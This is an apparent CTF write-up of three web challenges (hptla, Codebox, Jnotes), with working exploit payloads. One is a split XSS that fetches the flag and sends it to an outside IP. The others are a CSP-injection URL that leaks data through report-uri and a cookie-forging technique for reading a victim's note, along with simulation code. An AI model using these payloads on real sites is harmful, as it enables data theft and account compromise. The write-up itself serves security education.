
Rohit Narayanan M

hptla - LA CTF 2023

  • Each todo item is rendered as its own line, so whatever the app puts between two consecutive lines has to be hidden from the JavaScript parser. Two joins do that: end one line with a backtick and start the next with a backtick, so the separator becomes a template literal used as a harmless expression statement (this only works at a statement boundary, which is why those lines carry a ; right after the opening backtick and before the closing one), or end one line with /* and start the next with */, so the separator becomes a block comment (this works anywhere whitespace is allowed inside an expression, e.g. after return or between window. and location).
  • The payload has to be split into 20 such parts. Each line of the final payload below is one todo item; the longest is 12 characters.

Final payload

<img src='
'onerror='`
`;n=fetch;`
`;l=r=>{`
`;return/*
*/r.text();`
`;};`
`;p=q=>{s=/*
*/`http:`;`
`;s+=`//3`;`
`;s+=`4.9`;`
`;s+=`3.5`;`
`;window./*
*/location/*
*/=s+`6.144?
`+q;};`
`;f=`flag`;`
`;w=n(f)/*
*/.then(l)/*
*/.then(p);'
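To check that the pieces really reassemble into working code, the following is an added example (not code from the write-up): it joins the 20 items the way the page would, extracts the JavaScript from the onerror attribute, and runs it against a stubbed fetch and window. The separator the app renders between todos is not known here, so "</li><li>" is used as a placeholder, and the flag text is a constructed sample.

```javascript
// Added example, not code from the write-up: join the 20 todo items the way the
// page would, pull the JavaScript out of the onerror attribute, and execute it
// against a stubbed fetch/window to see the URL the payload navigates to.

// The 20 items from the final payload above, one array entry per todo.
const ITEMS = [
  "<img src='",
  "'onerror='`",
  "`;n=fetch;`",
  "`;l=r=>{`",
  "`;return/*",
  "*/r.text();`",
  "`;};`",
  "`;p=q=>{s=/*",
  "*/`http:`;`",
  "`;s+=`//3`;`",
  "`;s+=`4.9`;`",
  "`;s+=`3.5`;`",
  "`;window./*",
  "*/location/*",
  "*/=s+`6.144?",
  "`+q;};`",
  "`;f=`flag`;`",
  "`;w=n(f)/*",
  "*/.then(l)/*",
  "*/.then(p);'",
];

// Constructed stand-in for the real flag.
const FLAG = "lactf{constructed_sample_flag}";

// Length of the longest item; the whole splitting exercise exists because each
// todo has to be this short.
function maxItemLength(items) {
  return Math.max(...items.map((s) => s.length));
}

// The markup the page ends up containing: the items joined by whatever the app
// renders between consecutive todos. `sep` stands in for that separator.
function assemble(items, sep) {
  return items.join(sep);
}

// The JavaScript inside onerror='...': from after the opening quote to the last '.
function onerrorBody(html) {
  const start = html.indexOf("onerror='") + "onerror='".length;
  return html.slice(start, html.lastIndexOf("'"));
}

// Execute the handler with a fake fetch that returns `flagText` and a fake window
// whose location setter resolves the returned promise with the navigated URL.
// The payload assigns undeclared globals (n, l, p, s, f, w); a sloppy-mode
// Function body tolerates that, just as an inline event handler would.
function runPayload(js, flagText) {
  let resolve;
  const navigated = new Promise((r) => (resolve = r));
  const fakeWindow = { set location(url) { resolve(url); } };
  const fakeFetch = () => Promise.resolve({ text: () => Promise.resolve(flagText) });
  new Function("fetch", "window", js)(fakeFetch, fakeWindow);
  return navigated;
}

// Usage: "</li><li>" is a placeholder for the app's real separator.
runPayload(onerrorBody(assemble(ITEMS, "</li><li>")), FLAG).then((url) => console.log(url));
```

With a tag separator the handler navigates to http://34.93.56.144? followed by the separator and the flag: the separator inside the `6.144?` template literal lands in the query string, which does no harm. One caveat on the block-comment join: a block comment that contains a line terminator counts as a line terminator for the parser, so if the separator contained a newline, return/* */r.text() would return undefined and the query would carry undefined instead of the flag. Running the block with "\n" as the separator shows exactly that.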

Codebox - DiceCTF 2023

  • The server builds the page's CSP from the src of every <img> in the submitted code, so an img src injects CSP: a ; inside the src value ends the img-src directive and everything after it is parsed as further directives.
  • Add report-uri pointing at a domain you control so CSP violation reports are sent to you.
  • Add require-trusted-types-for 'script' so the page's own innerHTML assignment becomes a CSP violation; the report includes a sample of the assigned string.
  • Send the parameter twice, code=&code=<payload>: the front end reads only the first (empty) value, so it does not render the code and instead takes the branch that assigns into innerHTML, while the server still sees the payload (Express turns a repeated parameter into an array) and builds the injected CSP from it.

Final Payload: https://codebox.mc.ax/?code=&code=<img+src="*;+require-trusted-types-for+'script'+;+report-uri+https://your.domain.com/"+>
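The following is an added example, not the challenge's own code: it models how ?code=&code=<payload> looks to the front end versus the server, and the CSP header the server ends up sending. The server-side query parsing, the <img> regex and the base policy are a model of the behaviour the write-up relies on, not the real server source.

```javascript
// Added example, not the challenge's own code: model how ?code=&code=<payload>
// looks to the front end versus the server, and the CSP header the server
// builds from <img src> values. Server-side parsing and CSP construction are a
// model of the behaviour the write-up relies on, not the real server code.

// The payload from the URL above, decoded (+ is a space in the query string).
const PAYLOAD =
  `<img src="*; require-trusted-types-for 'script' ; report-uri https://your.domain.com/" >`;
const QUERY = "code=&code=" + encodeURIComponent(PAYLOAD);

function decodeComponent(s) {
  return decodeURIComponent(s.replace(/\+/g, " "));
}

// Server side: Express (through the qs module) turns a repeated key into an
// array of values, in order. Minimal model of that behaviour.
function parseQueryLikeExpress(query) {
  const out = {};
  for (const part of query.split("&")) {
    if (!part) continue;
    const eq = part.indexOf("=");
    const key = decodeComponent(eq === -1 ? part : part.slice(0, eq));
    const value = decodeComponent(eq === -1 ? "" : part.slice(eq + 1));
    if (!(key in out)) out[key] = value;
    else out[key] = [].concat(out[key], value);
  }
  return out;
}

// Front end: URLSearchParams.get returns only the first value for a key.
function clientCode(query) {
  return new URLSearchParams(query).get("code");
}

// Server side: collect the src of every <img> in the code (the regex shape is an
// assumption) and append them as img-src. An array value stringifies with a
// comma, which is enough for the regex to still find the tag.
function buildCsp(code) {
  const sources = [];
  const re = /<img[^>]*src="([^"]*)"[^>]*>/gi;
  let m;
  while ((m = re.exec(String(code))) !== null) sources.push(m[1]);
  const directives = ["default-src 'none'", "script-src 'unsafe-inline'"]; // assumed base policy
  if (sources.length) directives.push(`img-src ${sources.join(" ")}`);
  return directives.join("; ");
}

// What a browser sees: directives are split on ';', so the ';' that was inside
// the src attribute now separates three directives.
function cspDirectives(header) {
  return header
    .split(";")
    .map((d) => d.trim())
    .filter(Boolean)
    .map((d) => {
      const [name, ...values] = d.split(/\s+/);
      return { name, values };
    });
}

function serverCsp(query) {
  return buildCsp(parseQueryLikeExpress(query).code);
}

// Usage
console.log("front end code:", JSON.stringify(clientCode(QUERY)));
console.log("server CSP:", serverCsp(QUERY));
```

The two views of the same query string are the whole trick: the front end gets "" and takes its no-code path, while the server's policy gains require-trusted-types-for 'script' and a report-uri it never intended to send.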

Jnotes - DiceCTF 2023

  • The Java cookie parser mishandles quotes: when a cookie value starts with a ", everything up to the next " (including the ; separators and the cookies after it) is taken as that cookie's value.
  • JavaScript can set a cookie with an empty name, document.cookie = "=value"; the browser then sends just value in the Cookie header.
  • Use that to forge the start of a note cookie: document.cookie = '=note="'; is sent as note=", a note value that begins with a quote, so the victim's real note cookie ends up inside its value.
  • Give it path // so it is sent first: Chrome, per RFC 6265, lists cookies with longer paths before cookies with shorter paths, and the real cookies are scoped to /.
  • Now create an iframe with src // (so the request path matches the cookie's path and the forged cookie is included) and read the rendered note out of its innerHTML.
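The following is an added example, not from the write-up: it implements RFC 6265 cookie-header ordering to show why the path // cookie is sent first, and models the quoted-value parsing described above to show how that cookie swallows the victim's real note. The cookie jar, the note content and the session value are constructed samples; what an unterminated quote does is an assumption noted in the code.

```javascript
// Added example, not from the write-up: RFC 6265 cookie-header ordering (why the
// path // cookie is sent first) and a model of the quoted-value parsing the
// write-up describes (why that cookie swallows the victim's real note). The jar,
// the note and the session value are constructed samples.

// The victim's cookie jar on the notes origin after the attacker's page ran
// document.cookie = '=note="; path=//'. The nameless cookie is the last one set.
const JAR = [
  { name: "note", value: "FLAG_NOTE_CONTENT", path: "/", created: 1 },
  { name: "session", value: "abc123", path: "/", created: 2 },
  { name: "", value: 'note="', path: "//", created: 3 },
];

// RFC 6265 section 5.1.4 path matching.
function pathMatches(cookiePath, requestPath) {
  if (cookiePath === requestPath) return true;
  if (!requestPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith("/") || requestPath[cookiePath.length] === "/";
}

// RFC 6265 section 5.4: matching cookies, longer paths first, then by creation
// time. A nameless cookie is serialised as just its value.
function cookieHeader(jar, requestPath) {
  return jar
    .filter((c) => pathMatches(c.path, requestPath))
    .sort((a, b) => b.path.length - a.path.length || a.created - b.created)
    .map((c) => (c.name === "" ? c.value : `${c.name}=${c.value}`))
    .join("; ");
}

// Plain parsing for contrast: split on the separator first.
function parseCookiesNaive(header) {
  return header.split("; ").map((pair) => {
    const eq = pair.indexOf("=");
    return { name: pair.slice(0, eq), value: pair.slice(eq + 1) };
  });
}

// Model of the server-side behaviour described above: a value that begins with
// a double quote extends to the next double quote, across ; separators. If no
// closing quote exists the value runs to the end of the header (an assumption;
// the write-up does not say what happens then).
function parseCookiesQuoted(header) {
  const cookies = [];
  let i = 0;
  while (i < header.length) {
    const eq = header.indexOf("=", i);
    if (eq === -1) break;
    const name = header.slice(i, eq).trim();
    let value;
    if (header[eq + 1] === '"') {
      const close = header.indexOf('"', eq + 2);
      const end = close === -1 ? header.length : close;
      value = header.slice(eq + 2, end);
      i = end + 1;
    } else {
      const semi = header.indexOf(";", eq + 1);
      const end = semi === -1 ? header.length : semi;
      value = header.slice(eq + 1, end);
      i = end;
    }
    cookies.push({ name, value });
    while (i < header.length && (header[i] === ";" || header[i] === " ")) i++;
  }
  return cookies;
}

// Usage: the iframe request to // carries the forged cookie first, and the
// quote-aware parser turns the whole header into one note cookie.
console.log(cookieHeader(JAR, "//"));
console.log(parseCookiesNaive(cookieHeader(JAR, "//")));
console.log(parseCookiesQuoted(cookieHeader(JAR, "//")));
```

A request to / would not include the forged cookie at all (its path does not match), which is why the iframe has to load // rather than the normal notes page.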